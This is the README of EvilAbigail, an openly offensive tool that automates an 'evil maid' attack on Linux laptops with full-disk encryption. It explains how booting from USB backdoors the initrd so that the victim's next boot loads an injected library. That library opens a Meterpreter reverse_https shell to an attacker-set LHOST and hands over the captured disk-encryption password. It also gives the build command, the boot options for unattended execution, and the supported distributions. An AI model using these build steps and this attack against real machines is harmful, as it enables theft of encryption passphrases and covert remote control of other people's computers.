EvilAbigail - Automated Linux evil maid attack

Scenario

• Laptop left turned off with FDE turned on
• Attacker boots from USB/CD/Network
• Script executes and backdoors initrd
• User returns to laptop, boots as normal
• Backdoored initrd loads:
  • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
  • (Fedora/CentOS) LD_PRELOAD .so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros

• Ubuntu 14.04.3
• Debian 8.2.0
• Kali 2.0
• Fedora 23
• CentOS 7

Current Features

• python/meterpreter/reverse_https to compile time LHOST
• FDE decryption password stored in meterpreter environment (getenv PASSWORD)

Details

Compiling

See the Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.

Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

isolinux.cfg

The following options have been appended to the kernel boot:

mc superuser nodhcp quiet loglevel=0

Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing

Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)

Prerequisites

core.d is an unpacked core.gz from TinyCore with the below packages merged in.

Core-current is an unpacked Core-current.iso

The following packages have been installed inside tinycore (python, filesystem support):

• bzip2-lib.tcz
• filesystems-3.16.6-tinycore.tcz
• gdbm.tcz
• libffi.tcz
• mtd-3.16.6-tinycore.tcz
• ncurses.tcz
• openssl.tcz
• python.tcz
• readline.tcz
• sqlite3.tcz

Github Project